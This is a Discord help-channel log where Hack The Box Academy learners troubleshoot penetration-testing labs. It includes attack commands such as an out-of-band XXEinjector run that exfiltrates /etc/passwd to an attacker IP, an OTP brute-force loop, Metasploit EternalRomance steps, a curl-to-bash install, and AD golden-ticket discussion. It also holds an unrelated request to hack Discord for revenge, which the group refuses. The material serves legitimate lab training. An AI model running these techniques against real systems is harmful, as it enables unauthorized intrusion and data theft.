Wasn't explained, but you cleared it up. Much appreciated 🙂

Module: Active Directory Enumeration & Attacks
Section: Skills Assessment Part I

I used an SMB share to transfer files from my Linux attack host to my Windows target. I was able to sucessfully copy the files I wanted over. A little while later, I tried accessing the share that I had mounted N: but only some hidden .vscode directory was showing now.

So, I navigated back to the C: drive and tried to unmount the share using the command

net use n: /delete

But it just hung.

This has happened a couple times. Normally the command works for me.

it depends but depending on how you're accessing the target; evil-winrm has an upload function, xfreerdp has the /drive: option

i've also generally never mounted a share to windows

The SMB share was running using Impacket on my Linux attack host and I mounted it on the Windows target.

i mean: what tool are you using in the first place to access the windows target?

Oh, what's your preferred file transfer method? Cuz I tend to use the method I described quite a bit and usually it works fine.

I have a reverse shell connection.

i've generally used just a web server

or leveraged whatever tool i'm directly connected to the target with

I had established the reverse shell, mounted the share, transferred files, and then a little while later when I tried to access the share again, it was like how I described.

¯_(ツ)_/¯

Welp 😂

i always transfer all tools i feel i'll need over at once

I see.

it could just be a weird restriction with the revshell

Funny that it starts acting funky after I've already mounted and transferred files once

¯_(ツ)_/¯

Thanks anyways.

just weird shit with revshell stuff

I suppose so.

https://academy.hackthebox.com/achievement/1346583/136

far out. i knew what to do, but that was so finicky. took hours to do the assessment tbh lol.

@fathom pendant is there a specific section you'd recommend I exfiltrate the C:\Tools\ folder from? Or is any section in the AD Enumeration & Attacks module fine?

I haven't really paid attention to whether that folder varies throughtout the module, that's why I'm asking.

all of them have the same C:\Tools\ because spoiler ||the same target is reused throughout the module||

Ah alrighty, I figured as much since the IP address and stuff seemed the same. Thanks!

can someone help me with the command injection module, on the detection part of it. i am trying difrent payloads like ; and /n and && and 127.0.0.1; and 127.0.0.1/n && 127.0.0.1&& but notthing rasing an errors (thats what its soposed to do)

sure

you're entering the payload into a web app, so are you using the injection character itself or the url encoded character?

hi guys its that time of the day where i get stuck on a module

https://academy.hackthebox.com/module/144/section/3075

I am on the second question, and I am kind of confused on what CMS is. I googled it and there was like 3 different things.

it's a content management system

they are supposed to be user friendly software that allows users to create, manage, modify content without requiring specialized technical knowledge. think like wordpress. they have templates and stuff making it easy for users to build and maintain websites with pretty much zero coding knowledge.

oh okay

like godaddy

pretty sure godaddy just uses wordpress

oh

but who knows they may have their own

okay thanks

i know they have wordpress for sure though

Module: footprinting
Section: DNS

I've discovered more than 1 domains i can go through one being "root.inlanefreight.htb" and "inlanefreight.htb" however, i cannot seem to access the websites even if i've added them to my hosts file

That's because there aren't webservers running on those subdomains

that's got to be false, i've pinged the domains and the subdomain and it gave a response back

alright i got it

weird ah name but i wont ask questions

ping doesn't tell you if an ip is hosting a website or not

yes i know but it shows if it's up or not

no it doesn't

if the server accepts ping requests then it simply returns the amount of time it takes for the data to travel to and from said server. a server/computer could be configured to not reply to ping requests.

yes your picture shows exactly what i just said

Ok but I don't know why i cant even view the sites

ping has zero to do with websites

because they're not sites.

you can ping 127.0.0.1 on your windows box, but if you navigate there in a browser you're not going to see a website because your windows box isn't hosting a website.

ok yeah ur right

i got an idea

this section will have 0 to do with websites

and all to do with using dig

or nslookup

but even if i was to add it to my host it just claims server cant find it

because you need to also provide an ip for it to look against

ah right

dig is a better tool

also when i do a zone transfer there's no TXT for me to submit

but since inlanefreight.htb isn't a publicly routed website, it can't be queried without telling the tool what to query it against

because there's somewhere else you can transfer to (hint. it's not root)

also you misread the SOA file

there is no root.inlanefreight.htb; that's the admin email -- root@inlanefreight.htb

https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/

im not using root for dig i've used the normal inlanefreight.htb

well yes

but you can dig subdomains

im assuming it's just gonna be for ns.

why are you assuming?

it's just showing me ns

dig axfr inlanefreight.htb @ip
look at the list; there should be an entry that stands out for you to try and dig further into

im also refering to question 2

question 2 can be answered in the same way

¯_(ツ)_/¯

in fact most of the other questions are answerable by just doing the thing

there are different types of records; one being the ns record

a zone transfer will retrieve all records on the host

also remember, when you query a server, you're seeing records relative to it

can anyone tell me how do i learn hacking discord servers ? which resources should i follow ?

none. Read #rules

😦

Lmao 💀💀

what you're asking for is illegal my guy

also when it says "format: HTB{...))" do i have to do this

HTB{answer}

it's telling you what the answer will look like

Oh

that way you're not just guessing "is this the answer?"

yeah

i wanted to take revenge of a guy , i will just find a black hat hackers group/dc server

Typically it's a flag

https://discord.com/security nah they have a bug bounty program 😛

then again no black hat will be able to just "hack" a discord server, you're just wasting ur time

Bro is the type of guy to ask, "can you hack Instagram?"

lmao i am just asking for resources'

i dont use it

this discord server is about the hack the box platforms, not hacking stuff like discord. you likely won't find much help here.

good luck finding a public one

thnx

it was sarcasm

but have fun getting scammed bud

This is not a black hat hacking group. Even if you do find a black hat group, like you said, they'll probably laugh at you when you ask them to teach you to hack discord.

And if anyone ever tells you they'll help you with this, you're getting scammed.

bros gonna accidentally get his own shit rooted by hackers

yeah you're just going to get scammed.

i manipulated and asked chatgpt for these stuff

he gave some replies

anyway @rustic sage do a base zone transfer; then just dig against all found A records until it works (note: this is serious, there's a small list so you don't gotta fully automate)

but they seem useless

because chatGPT doesn't know what it's doing

okay thank you

when you mean by a "base" zone transfer, do you mean just do a normal zone transfer?

You can't hack discord dude.

that's what i said to him

what

😦

Unless you're a state backed highly intelligent group of hackers, you're probably not hacking discord

dw wait till hackthebox makes a discord server privilege escalation module 😂

You are far outside your depth of knowledge. Trust us when we say just forget about it. Don't pursue some "black hat hackers" online to "hack discord". Again, this is also not the place for this kind of stuff.

so can i just heck the owner's account

nah bro ik how to do it check the hackthebox site they actually released a discord server privilege escalation module for only 100 cubes

ok thnx

np

i was being sarcastic btw

bros actually gonna check 😭

ik 😦

Gonna be honest, sounds like you have brainrot from media or something which makes you think hacking is some kind of technowizardry that can just do anything. Just give it up, drop the topic.

the most i have done is hack a wps protected wifi by running a script 😦

Definition of Script Kiddie right there

i feel personally attacked

ngl being a script kiddie helps a little

it is. the darkest of wizardry. everyone else are but muggles 😉

yes

oki

when i refer to base n it generally means without modifying commands or doing anything extra

so just for these ones?

yes except the ns one

oh yeah i know

just go through that list until you get the right thing :)

thank you 🙂 ur the best

you'll note that some other answers can be answered from this response of where you can axfr to

yeah

transfer has failed

you'll get a fail on all except one

ohhhhh yes that makes sense now

as I said; do it on all the found subdomains

LET'S GOOO

the answer does say "determine IF you can"

oh yeah true LMAO anyways thank you so much i appreciate ur help

so long

it's been 5 minutes already and i've not gotten any results so far

maybe ip address is flagged do you think?

nope

you're not looking in the right spots

much like dig; dnsenum can also bruteforce subdomains

yes thats what im using

dnsenum

you already can zone transfer to inlanefreight.htb and you know another you can transfer to

so try the other subdomains (also you'll need a more fierce list)

my list has so much inside

i might have to wait, it gave me another domain on 127.0.0.1

well that list doesn't contain the answer

wont know until it's done completely

I know

and i'm telling you; you're wasting time

but by the looks of it, it's showing me it's still going and it shouldnt take this long

yeah im a hagve to find a new list

this was a hint

I know

Do you know what list i could use?

... take into consideration the word I emphasized

but also you won't get it by bruteforcing inlanefreight.htb

you'll get it via a subdomain.inlanefreight.htb

you have the list of subdomains in front of you

is optional excercise are really needed in order to learn what was mentioned in the section ? i mean i stuck in linux fundamental container optional excercise and it was much complicated also time consuming for me so confused of whether i can skip it or is it necessary , you're opinion might help.

you can skip it

the optional stuff is just to help you get a better feel for the stuff

okay, thanks for you're opinion.

Just wondering about the stack-based buffer overflows on linux x86, I have a question. How do I overwrite the EBP and EIP? I've tried the command as shown, and the other commands as shown. I can't get it to overwrite in gdb with the print command

make sure you use python2.7

i.e it shouldnt be python3

ok let me try that, thanks

i mean i also see him using run #(python ...) instead of run $(python...)

I do this because of the error I get when I use a lower lvl prompt.

that's weird

I was stuck bruteforcing OTP in api attacks broken authentication. Can anyone help me?

the vm for the citrix breakout windows privesc module seems borderline unsable. it's like watching a slideshow in slow motion

Think of another method 😉

Since the OTP format is not clear

goodmorning yall

What is up

i need help with my metasploit module

just ask your question

https://nohello.net ; https://dontasktoask.com

i was asked to use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents but when i ran it i got this error

but hints say "Focus on the POST endpoints /api/v1/authentication/customers/passwords/resets along with /api/v1/authentication/customers/passwords/resets/email-otps or /api/v1/authentication/customers/passwords/resets/sms-otps." so what do you recommend ? I tried brute force password but I couldn't do it.

your LHOST isn't set

oh sorrt about that im new here

set LHOST tun0

ok so if i set it.....it should work???

yes

the target doesn't have a route to the public ip 94.237.54.7

it does have a route to your tun0 ip (10.10.x.x)

oh worked

i tried the show options on the exploit but it didnt bring out a LHOST option so i thought it wasnt neccesarry

if it's RCE/reverse shell, it is

also options is just the command

it's towards the bottom after all the target options

this is the error I get when using standard $

well you need to specify python version

ty let me go do that

I'm sorry, I misread it. I think you are working on a broken authentication module

So I use python 2.7? By changing the $path variable?

as far as I'm aware people that have done this have said that Bruteforcing isn't the solution

if it's not in your path

ok thanks

you can just specify python2.7

or the full path to the python2.7 binary

yes the section broken authentication in the module api attacks but i was stuck and don't know what to do next

how do i change directory to desktop? i tried cd but it didnt work

try dropping into a shell first, then try cd

(you're in a meterpreter shell, not a cmd or powershell)

oh

thanks i have done that

shell

then you can move around

i did that and was able to get to desktop how do i open/download the file?

.

type flag.txt

type flag.txt

...

the command is "type"

^

then the filename

you're missing some windows basics there bud

my bad

also you don't need to type shell when you're already in the windows command prompt

thanks for your help yall😭

if you want to download a file with msfconsole that's done outside the shell

i was legit thinking i could switch back to meterpreter shell

all good mate. it can be confusing at first, but it gets easier.

exit

thanks man

noted

i suggest the information security foundations path before you do any other modules

^ this. then you'll be back to 'Meterpreter 1' which shows you're in the msfconsole again. then if you want to, you can background the session. but that is beyond your needs right now.

then in the meterpereter console you'd type download C:/path/to/file

definitely agree with this. if you're unfamiliar, take the time to do the fundamentals. it'll mean you'll absorb more info when you do the modules and not just spam copy/pasted commands.

and you'll spend less time trying to get through basic hurdles

the hardest part of any module should just be executing the technique itself

how much cubes will it cost me?

they're all tier 0 modules

so they'll give you the 10 cubes you spend back on them after you complete

bruv fr i could have legit sworn my vn was broken

I tried setting up alias to shell using terminal command alias python=/usr/local/bin/python2.7

i will study the module thanks once again

Still can't get it to go to version 2.7

¯_(ツ)_/¯

likely best to do it in a venv

as python is actually pulled from /usr/bin/python

which is usually symlinked to your highest python version

ok will install 2.7 and downgrade ty

https://docs.python.org/3/library/venv.html

i wouldnt recommend that. look at pyenv

i don't recommend downgrading

as it will break all of your other tools

if you downgrade you will likely brake other packages

https://github.com/pyenv/pyenv

ty I will look into this

does academy have paypal option, currently if i click update payment method it only shows credit card. its probably because it is the current method

just do sudo apt install python2.7 you can have both python at same time

I believe so

ask support to remove your current method 🙂

wont it remove after it expires?

not sure

it shows only credit card ( the sub got expired just now )

Best to ask support as it is a billing matter and they do not monitor Discord. I remember being able to select PAyPal a little while ago

are you sure that its on academy, i was able to get paypal on main website

yes, I am sure

oh ty, i have asked the chatbot but it says they will mail and no one is available now

they should get online soon 🙂

anyone had issues installing bashfuscator?

Hello! Could someone please help me with this issue I've had?
I'm at the windows fundamentals module at the section about shares and ntfs permissions.
I've used rdp to log into the target and made a share. The funny thing is that from the pwnbox I can't acces it, or ping the target machine. Pinging the pwnbox from the target gives a positive response and I even captured the packets with tcpdump on the pwnbox. Anybody have any idea? I was left with none and chatGPT doesn't know a thing. Thanks for your time! :))

PS: I made an inbound rule on the target to let trafic from that IP pass, it still doesn't work

Hey
I started learning python and I want like to do some tasks to actually see if I have actually learnt anything

You can try the exercise in the module, building that program that makes a wordlist from a website, it might help

If anybody has any idea, please let me know, here or DM.
Thanks :)

Where is it

https://academy.hackthebox.com/module/88/section/914
I think this is the one

how are you trying to access the share

smbclient
But the thing is that I wouldn't be surprised if that didn't work, but even ping doesn't work 😢

what's the command

sudo smbclient -L IP -U htb-student (I put in sudo just to be sure)

It's the same command as suggested by the course

have you tried \\IP?

the full command pls

sudo smbclient -L 10.129.190.245 -U htb-student

smbclient \\\\SERVER_IP\\Company Data -U htb-student

either //IP/Share or \\\\IP\\Share

sudo smbclient \\10.129.190.245\Share -U htb-student
Password for [WORKGROUP\htb-student]:
do_connect: Connection to 10.129.190.245 failed (Error NT_STATUS_IO_TIMEOUT)

Can I have some assistance for the below module:

Name: ACTIVE DIRECTORY TRUST ATTACKS
Section: Unconstrained Delegation
I was able to get a TGT for DC01$. With the TGT I have done a DCSync attack where I was able to retrieve the NTLM hash of krbtgt. With this hash, I have done a golden ticket to forge a service ticket for the Administrator user in the inlanefreight.ad domain. I am able to list files file on \DC01.inlanefreight.ad\C$. However I dont have the permissions to list files in \DC01.inlanefreight.ad\C$\UCD_flag where the flag is located.

Yo, so INTRODUCTION TO MALWARE ANALYSIS , debugging section, inetsim file does not exist

what should I do I am not able to continue with thte excercise

this is on the pwnbox

for some reason the default firewall is blocking smb, that's a problem with the module I think, for now you can turn off the public firewall and you will be able to access the network share

also again either //IP/Share or \\\\IP\\Share

Alright, I'll check it out, thank you

OK IT WORKS

Thank you!!! :))

just use DC01$ to access the flag

wdym? use the TGT of DC01$

yes

can I DM you?

what for you have DC01$ yes? just use that ticket to access it

they have mechanisms in place so that only specific accounts can access the flag

I have the TGT for DC01$ but I can't list files in \Dc01\inlanefreight.ad\C$\UCD_flag

am I missing something here?

that's not the right path

submit the flag located at \DC01\UCD_flag\flag.txt
C$ requires admin rights

can I DM you to sort it out?

hello
im at the noriben module in malware analysis
i use procmon to find the tcp udp traffic of the shell.exe
but it doesnt produce any traffic to any ip

has anyone figured it out?

svchost for example has a lot of traffic

can someone help me with login brute forcing website skill assessment. ive gotten to the admin login page but when i try to run hydra on the login form, i get "all children were disabled due to too many connection errors"

where i filter shell.exe there is nothing

works for me

got it thanks

nvm figured it out

is that just me or is anyone getting absolute nothing but 0s in all the stats of hackthebox.eu in waybackmachine?

Hello, I'm completing some of the easy modules and in the WIndows fundamentials I get an error from submitting the right SID on the last two lecture questions. Is there some kind of bug or should I change the format of the SID somehow?
(as an example for bob.smith sid I have S-1–5–21–2614195641–1726409526–3792725429–1003)
I get the same error on the skills assessment SID questions even though I've placed the correct SID

In standard SID notation, the separators should be hyphens (-) rather than en dashes (–). This subtle difference might be causing the submission error maybe...

oh yea that was the problem, thank u

hello, not sure if this is the right place to ask, but is anyone else having issues spawning targets in the academy modules? Password Attacks - Pass the Hash, to be more specific

Try switching to a different VPN region

I have already tried that, but no success. Thank you, though

us4 works

took a while, but it spawned on us4. Thanks

Hi ! I'm working on the "INTRO TO WHITEBOX PENTESTING" module - section Skills Assessment.
I've found one of the RCE method but looking for the second one.
Does anyone can nudge me?

I’ve done a few of the introductory paths, intro to basic toolkit and intro to information security and now working my way through intro to pentester. I’m just wondering does this click further down the line, I’m only at foot printing but I try to do easy boxes on the main platform and still struggling with them

I found retaining all the information in footprinting a challenge also, but I think it will come with practice in future modules. Personally I feel like completing the modules first is what will allow me to rank up more easily on HTB because they show you the process from A to Z. Anyways you're not alone keep your chin up!

Yeah it is a large module with a lot of info, I'm using academy alongside my uni studies as I'm going into second year and apparently it ramps up in difficulty quite a lot, so trying to be better prepared! Thanks for the reassurance 😄

└─$ ruby XXEinjector.rb --host=10.10.16.106 --httpport=8000 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter
hey guys i did the command up above as shown in the xxe automation part. ive saved the modified request in tmp and name it xxe.req my vpn ip and named port stated the file i wanna read also the filter and out of band flags but still the response im getting is that. -> XXEinjector by Jakub Pałaczyński

Enumeration options:
"y" - enumerate currect file (default)
"n" - skip currect file
"a" - enumerate all files in currect directory
"s" - skip all files in currect directory
"q" - quit

[-] Multiple instances of XML found. It may results in false-positives.
[+] Sending request with malicious XML.
[+] Responding with XML for: /etc/passwd
[+] Retrieved data:
[+] Nothing else to do. Exiting.
now when im looking for the logs they none existent, i dug deper into the xxe folder and found a log folder but its empty

does getting domain admin means you can compromise domain controller?

Yes

already compromise*?

Hi, I'm having issues with the Windows Privilege Escalation Skills Assessment - Part I. I managed to get a reverse shell as an unprivileged user, and noticed I have the SeImpersonate privilege. I'm using JuicyPotato to exploit this, I have also found the valid CLSID to be passed in as an argument to the JuicyPotato binary, but I am unable to get a reverse shell as System. Here's the command I'm using and its output:

And visibly I receive no connection.

Any help?

Hello everyone, I am on the Information Gathering (Web): Web Archive module as in the Penetration Tester Job Path.
So far I have completed all other questions except the first and second.
For the link I have changed from hackthebox.com to hackthebox.eu as instructed.

The first asked about the amount of pentest lab of HTB on 8thAug 2018,
and the second asked how many members did HTB had in 10Jun2017.

And from the screenshot attached here, I saw none from the wayback machine as from web.archive.org.

Have anyone experienced the same issuse in this module?

check your url? read the question, scroll down and search more

I saw my mistake there, thank you

i recently completed this

bro if u face any issue u can dm me i can help u with approach

Anyone available to assist with Windows Privilege Escalation - Windows Server? Having trouble with the rundll32.exe command.

Hi everyone! I'm totally stuck on Attacking Common Applications - Skills Assessment II - "What is the admin password to access this application?". From what I understand from the forums the way forward is to create a Gitlab account but when I try I just get error code 422.

Just wanted to check if I'm on the right path with this?

Hi ya, can anyone help for Windows Evasion Skill Assessment 2 ? I'm able to get reverse shell by executing the VB Script directly on target box, but was unable to get it via trigger and therefore escalate to another user...

@fathom pendant hey im having issues finding the wordlist for the SMTP part

Have you tried the wordlist from the resources button?

O

I didn't know that was a thing ngl 😂

thank you though appreciate it a lot

anyone?

I need help to clear "Information Gathering - Web Edition Skills Assessment". I was able to answer 2 out of 5 and unfortunately, I'm stuck. Nothing seems to work whenever I try to using scrapy, finalrecon, gobuster. Can you please point me in the right direction without disclosing the answers? Here's my hosts file to start:

GNU nano 8.0 /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali

The following lines are desirable for IPv6 capable hosts

::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

83.136.254.169 inlanefreight.htb

whats your gobuster code?

gobuster vhost -u http://inlanefreight.htb:34024/ -w /home/kali/SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt -p pattern -t 50 | grep -Ev "Status: 400"

gobuster dir -u http://94.237.58.196:59272 -w /home/kali/SecLists-master/Discovery/Web-Content/directory-list-2.3-big.txt -t 50

the first one is on the right track. try make it simpler 🙂

look at the virtual hosts module again

I see, thanks for confirming. Perhaps can you give example? Also what about crawling, I can't seem to make it work.

Sure DM me

Dm sent.

Not sure why inlane freight wouldn't be the answer 🤔 it does say organisation name is to equal as that

nvm

Don't need a pattern, you do need a bigger list

i figured out why that wasnt correct i got the answer

Limited information 😉

Hello everyone

I am working on the Information Gathering - Web Edition skill assessment

whois inlanefreight.htb
No whois server is known for this kind of object.

I got the above error when running the whois command

anyone know what's wrong? I already added the domain name to /etc/hosts

did u try to add it in the /etc/hosts file?

yes, I added

and i can ping this domain

there are other services out there u can use instead of whois

but whois doesn't work

to retrieve your answers

inlanefreight.htb is not a real domain, you won't find it on whois

but the solution of HTB is using it

The ".htb" top-level domain is not a standard public domain.

Whois searches public registrar info, inlanefreight.htb isn't a public website

Are you sure it's not inlanefreight.com?

Of which that is a real website

vHosts needed for these questions:
inlanefreight.htb

• 1 What is the IANA ID of the registrar of the inlanefreight.com domain?

inlanefreight.com is public, inlanefreight.htb is not. It confused me aswell

Yeah it's inlanefreight.com

The question says .com

OMG

thanks everyone

Reading the question helps

this is so confusing

Not really

TRUE

It's not confusing if you read the question

¯_(ツ)_/¯

I read it, just did not catch the .htb and .com change

Then you didn't read carefully

LOL

true

for the client side validation part of the file uploads module i am trying to click the upload button but it doesnt let me upload a file, its as if the button has been disabled even though its not, can someone pls help me?

¯_(ツ)_/¯

cute cat btw

Thanks

have you tried clicking on the portrait?

ooooohhhh, no way. thc u (it works)

The upload button sends the request to the server

do you guys have a full time job? I started my subscription in February and only completed 25% of the CPTS modules, am I too slow?

Nah

hey, wayback machine is dead ?

use .eu and scroll

No

guys does reconspider supports alternative port than 80,8080 or 443?

curl --head http://web1337.inlanefreight.htb:33555/admin_h1dd3n
HTTP/1.1 301 Moved Permanently
Server: nginx/1.26.1
Date: Wed, 10 Jul 2024 16:01:22 GMT
Content-Type: text/html
Content-Length: 169
Location: http://web1337.inlanefreight.htb/admin_h1dd3n/
Connection: keep-alive

can anyone tell me why the final slash is so important?

without that slash, we cannot get the content

You mean the /admin?

/admin_h1dd3n and /admin_h1dd3n/

you see the difference, the final slash is important

without that slash, we only got HTTP 301

Bc admin_h1dd3n is probably a directory and not a file

https://stackoverflow.com/questions/61547014/restful-uri-trailing-slash-or-no-trailing-slash

I found this

this can be considered spoilers for the module btw

It's not allowed?

I think modules are just for learning and practice, it's not the exam

the subdomain prob

In exam, sure, we shouldn't cheat

how to download a file from pwnbox

pwnbox has internet connection

You can upload to a temp file website

Then download from there

There's ssh creds on the desktop, you can just use scp

ooh ty

damn i didnt knew we could ssh into pwnbox

the ssh looks cool

Information Gathering - Web Edition
Skill Assessment

I am currently stuck at question 3 of the skill assessment.

I have attempted gobuster directory brute-force and vhosts enum on the target machine for now.
I appended 94.237.59.199 inlanefrieght.htb
at the end of /etc/hosts (the site can be reached via firefox as http://inlanefreight.htb:50304)

I also tried ffuf on the target too but that yielded no results (ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://94.237.59.199:50304 -H 'Host: FUZZ.inlanefreight.htb')

I configured and installed reconspider on pwnbox and it successfully ran against the public site of inlanefreight, but no luck on the .htb version of it within pwnbox. As it doesn't yield anything within its results.json unlike its attempt on the public site.
python3 ReconSpider.py http://inlanefreight.htb:50304

There isn't any robots.txt within the target site either. Can you guys provide me with some hints of your exploration on that target?

Thanks for reading this wall of text lol.

did you find the subdomain

sadly no for now..

your ffuf looks fine it is supposed to find a subdomain

make sure you used the right filters

Module: Active Directory Enumeration & Attacks
Section: Skills Assessment Part I
https://academy.hackthebox.com/module/143/section/1278

I've used SharpHound.exe from the initial Windows target to gather data and now I'm trying to upload it to BloodHound but it just stays at 0%. I've tried several times. Anyone got any idea why?

i think you need compatible versions

it gets stuck at 0 if you use incompatible versions

How do I ensure the versions are compatible?

if you're using legacy bloodhound, the repo has a folder called "collectors", inside there is the sharphound you want to use

Would like a point in the right direction for the Microsoft Defender AV Bypass - Dynamic Chapter.
I'm suppose to create a reverse shell and then read a file on another user's desktop for the flag. I created the RShell, compiled it, and placed it in C:\Alpha\dynamic. It passes the AV check, a process starts my shell, then it dies 45s via a timeout. I thought it might be the IP and port since they are args in the program and I never supplied them, so I hardcoded them. Again, compiled, and placed into the correct folder. Checked the log. A process starts my shell, then it dies 45s later. tshark also shows no incoming TCP packets from the victim to my attack computer, only the RDP connection. I can ping my attack from the victim. Wondering what I should look at next to figure out a solution.

i dont remember but you have to install them from same place, check its readme

also when you run sharphound it will tell you the version it's compatible with

do you have your own windows vm to test with

Yes

does it work?

Review the section again, it also goes over micr0_shell

I just saw this on the first line of the output of SharpHound.

2024-07-10T09:38:46.5638037-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound

I just checked and my BloodHound is running version 4.3.0
How do I update it? I've already tried sudo apt install bloodhound

Does the solution 3 not work? I understand there are multiple solutions. i want to do them all and am starting with the 3rd.

bh 5.0 above is community edition, it's moved to using docker now
https://github.com/SpecterOps/BloodHound I personally like it more but if you want to use the older version you'll need to use a older collector

Up to which version is this SharpHound recommended for?

that sharphound should work for your version of bloodhound

The rshell method requires args to be passed to it, does the script checking your method also pass args to your program?

Ohhh, I'm not familiar with how to use docker. I think I'll stick with the older one then. So I just use the SharpHound from the collector folder?

yeah it should work or you can grab it from https://github.com/BloodHoundAD/SharpHound/releases v2 should be fine

Does anyone want to buy a Fortnite account

no

<@&861185840277487616>

I'm assuming I'll have to switch eventually to the docker version of bloodhound. Guess I should learn it then.

I thought this might be an issue. So I thought I wrote my program to just ignore it. Maybe it's not doing that. I'll take a look at that as well. Thank you both.

v2.0.0?

this should work

ty

Ignoring the args will have no way to go back to your host unless you hard coded the variables.

Why did I get pinged for this?

Btw is there a link to only git clone a specific file, like this one in case? I normally wget the raw for scripts.

uh, you shouldn't have

Well I got

huh

A notification

wget works too with the download link

So this link?
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe

yeah

https://www.kali.org/docs/containers/installing-docker-on-kali/

Thanks. Just to clarify, there's no issue with the pre-docker versions of bloodhound yeah?

nope

@shut quest It was the args. I left the if args != 2... and I assumed the program was working because the logfile said it timedout. I removed the check for args, hardcoded the ip and port, and it worked. Thank you so much. @next bronze

Maybe the next section explains this, but I was able to run a powershell instance as another user. Was this because beta was executing my reverse shell, allowing me access to it's permissions, or was this a LPE I don't understand. @shut quest

Each of those folders has a different user running the executable placed in it

That makes sense. Thank you @shut quest

Module: Information Gathering : Web Edition
Section: Skills Assessment

I have continued the vhosts enum via ffuf
ffuf -w /usr/share/seclists/Discovery/subdomains-top1million-5000.txt:FUZZ -u http://94.237.59.199:50304 -H 'Host:FUZZ.inlanefreight.htb
and directory bruteforce via gobuster
gobuster dir -u http://inlanefreight.htb:50304/ -w /usr/share/seclists/Discovery/Web-Content-combined_directories.txt
Neither have yield any results, would that be any possible mistakes made within the command itself, or would it be just the wrong wordlist to do?
Added 94.237.59.199 inlanefreight.htb into /etc/hosts already.

.

Both of your commands are incorrect, review the section where these are provided and review piece by piece to find out what's wrong.

Strangely enough when I used wget on this link compared to when I downloaded it directly from the browser, I got two different sizes... The first one is the wget and the second is direct download from the browser. @next bronze

Also sometimes you need a different/longer word list.

ah wrong link then, you need the raw file as always

Raw works for executables? I'll test it out.

raw just show's whatever data blob is on the server, it works for any file types

Can use file to quickly identify that one would be ASCII/text

Yup, worked, thanks.

Thanks!

wait they said show results tho

that's not right there should be a bunch of them

If my memory serves me, missing a flag for go buster and the IP should be a host for ffuf

Guys I got a cache file from chrome that is flagged as a virus. It happened while I was on academy pwnbox. I didnt download anything from the web. Is it possible that chrome/windows flagged it bc of HTB?

@next bronze regarding BloodHound, I'm currently using Pwnbox so it has the 4.x.x version installed. If I'm going to be using my own VM and I want to use the pre-docker version, I'll have to download it specifically from the repo, right?

if you wanna set up docker def do it in your own vm

I just meant that if I wanted the older version (pre-docker), I'd have to download it from the GitHub repo, right?

kali should have it installed by default but yeah you can install it yourself if it isn't

I like CE because you can set it up to access using any devices in the network through the browser

Can you mark as owned in CE now?

yes

I tried using it but... nothing happened?

./program.exe

Just ran it with the syntax .\SharpHound.exe and it worked. Thanks.

<@&861185840277487616> other channels too

Great job. Thanks for letting us know!

can you help me please?

What seems to be the problem?

last two days my discord account sends scam links to all my servers, maybe my account token was stolen I changed password and regain access to it. so I got ban

.

Wait a sec.

Can you please DM me?

what's the alternative to sudo apt install python2.7? that's what academy says i should do, but 'no installation candidate'. searching it up returns the same command

when i try to use python server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 without 2.7 attached, it still results in syntax error so i assume python2.7 isnt on pwnbox either

i'm using the latest parrot os

In the Live-Debugging section from the Advanced SQL Injection module i am running in the following problem. After decompiling the jar with fernflower and starting the remote debugger. The line numbers appear to be out of sync as a result when I place a breakpoint, it Breakes/Pauzes on a different line. DId any one find a way to get it back into sync?

Hi,
I am doing the Documentation & Reporting Practice Lab
but now the DC @ 172.16.5.5 is not there, yesterday it was there, I already reloaded the lab but it is the same
Is it a technical problem?

Can't run tplmap.
https://academy.hackthebox.com/module/145/section/1344
Is there any other tool to automate SSTI, tplmap's dependencies aren't installed on the PwnBbox, tried to use a python3 venv but it seems the a dependency need's python2.
Can't install python2 on PwnBox to some other error.
And even running locally encounter this error "TypeError: method expected 2 arguments, got 3"

Installing python2.7 on pwnbox, ignore the warnings about missing extension, just run everything here

curl https://pyenv.run | bash
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(pyenv init -)"' >> ~/.bashrc
source ~/.bashrc
pyenv install 2.7
pyenv shell 2.7
python --version

can someone help me with the xxeinjector automation?

Any tips on being able to run the LinEnum.sh script on the getting started module, last task “knowledge check”?

Transfer from your machine to it, but tbh linenum isn't required

One of the first few things you should do as a user is see what you can (su)do

Alright thank you! Was just going to follow the steps but I’ve had some other ideas

Hey dude i was stuck on this for ages aswell, you have 5 mins from requesting the OTP to do your ffuf, first time i request the OTP and then went off to make the payload and wondered for ages why it wasnt working, the OTP list i just madea list of 1 to 10000
||for ((i=1; i<= 10000; i++)); do echo $i >> OTPlist
done||

Long shot but did anyone take notes on the Password Attacks module? Specifically Sam's password from the Password Mutations section? The following module wants you to reuse the creds for a foothold but I didn't take notes and it's been a few weeks. Thanks 🫡

Steps? I don't believe that this lab is guided

Just regrab it

You should always save creds in modules, never know if they're gonna get reused later

Yeah hindsight is 20/20, what do you mean by regrab it?

...just reattack the service to grab it

It's not like it magically stops existing

Right... kinda the point of asking here before I do that

As a note; the linux envs and the windows envs are the same throughout this lab

No one is just gonna hand it to you

Lol thanks for your help

Just gracefully take it as a lesson for future

You can use 48 threads safely in this module against most services

You should be using the mutated password list

Also don't attack ssh

Ssh is painfully slow and it's likely dropping connections

If someone who can actually help sees this please DM me

Dude just attack ftp and wait

You'll likely get it before someone dms you

did anyone had problems with Attacking common application module - attacking tomcat section ? credentials doesn't work!

worked now! after reseting the lab and got a new IP address 🙂

ran them by script, and one by one on both pwnbox and vm. this is a nightmare

some of the extensions are missing but that's fine

just run the rest

I've tested it and it works

it does say python3 but ill run the command

can you run the rest of the commands buddy

yup

python --version what do you see

the screenshot shows that i've run the rest of the commands by the python --version showing Python 3.11

~

I just spun up a fresh pwnbox, ran all the commands and it worked

oh

ill try it again

most have been fine for me

¯_(ツ)_/¯

this is an ongoing issue since i do academy

/timeout:60000

¯_(ツ)_/¯

thanks ♥️

